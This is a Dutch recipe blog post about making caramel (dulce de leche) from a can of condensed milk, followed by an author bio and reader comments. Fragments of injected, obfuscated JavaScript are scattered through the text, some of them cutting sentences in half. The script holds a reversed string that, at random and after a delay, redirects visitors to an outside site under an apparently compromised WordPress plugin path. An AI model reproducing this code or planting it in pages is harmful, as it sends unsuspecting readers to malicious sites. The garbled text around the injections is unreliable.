Caramel maken van gecondenseerde melk

Zelf caramel maken was nog nooit zo eenvoudig met deze truck. Het enige wat je nodig hebt is een blikje gecondenseerde melk. Echt waar, met een beetje geduld maak je hier een heerlijk stroperige caramel van. Probeer het zelf!

) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom_links_target=”_self” img_size=”800×400″]

Gecondenseerde melk is net iets anders dan gewone melk. Het vocht uit de melk is onttrokken en daarnaast is er nog extra suiker aan dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toegevoegd. Eigenlijk maak je caramel van suiker en op deze manier maak je caramel van zoete melk.

Dulce de leche

Caramel gemaakt van gecondenseerde melk wordt ook wel ‘Dulce de leche’ genoemd. Dulce de leche wordt vooral gebruikt voor op brood, maar wordt ook veel verwerkt in taarten, koeken, puddingen en ijs. Vooral de combinatie met chocolade is heel erg populair.

Wat heb je nodig?

Een blikje gecondenseerde melk, bijvoorbeeld van Friesche Vlag. je kunt dit gewoon in de supermarkt kopen en staat vaak bij de koffiemelk.

Aan de slag!

Zelf maak ik altijd een paar blikjes tegelijk. Als je ze niet openmaakt kun je makkelijk een paar weken bewaren in de koelkast.

Om de melk om te dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toveren in de gouden caramelpasta, laat je het blikje ongeveer 2,5 uur zachtjes koken in een pan met water. Het is hierbij erg belangrijk dat het blikje altijd onder water staat. Doe je dit niet dan bestaat er een kans dat het blikje ontploft. Na 2,5 uur koken is de caramel klaar en kun je het laten afkoelen in de koelkast.

Je kunt de caramelpasta nu gebruiken op brood, in taarten, op koeken en nog veel meer!

Anouk - Viving.nl

De website Viving is opgezet door Anouk (28 jaar). In mijn vrije tijd besteed ik veel tijd aan het inrichten van het huis en werk ik graag in de tuin. Daarnaast ben ik dol op lekker eten en drinken. Ik sta dan ook vaak in de keuken om voor familie en vrienden te koken. Als ik in huis bezig ben dan kan ik me heerlijk ontspannen en alle inspiratie die ik hierbij op doe wil ik graag met jullie delen op deze website.

2 Reacties op "Caramel maken van gecondenseerde melk"

 • comment-avatar
  Thea 27 februari 2016 (10:39)

  Gemaakt en het is heerlijk! Wat kan ik doen om het blikje onder te houden? Ik moest er steeds bijblijven staan om het onder te duwen met een houten lepel en dan is drie uur lang hoor hi hi! Misschien heb jij een tip, met vriendelijke groet Thea Hoogvliet.

  • Anouk - Viving.nl
   Anouk - Viving.nl 18 maart 2016 (16:13)

   Beste Thea, wat leuk om te horen dat je dit hebt geprobeerd. Ook ik vind het een uitdaging om hem steeds onder water te houden, maar meestal blijven ze netjes staan. Belangrijk om af en toe water bij te vullen, gaat het blikje toch drijven kun je er het iets zwaars opzetten, bijvoorbeeld een kleine ovenschaal van aardewerk. http://www.viving.nl/wp-admin/edit-comments.php#comments-form

Plaats een reactie:

Je emailadres wordt niet weergegeven.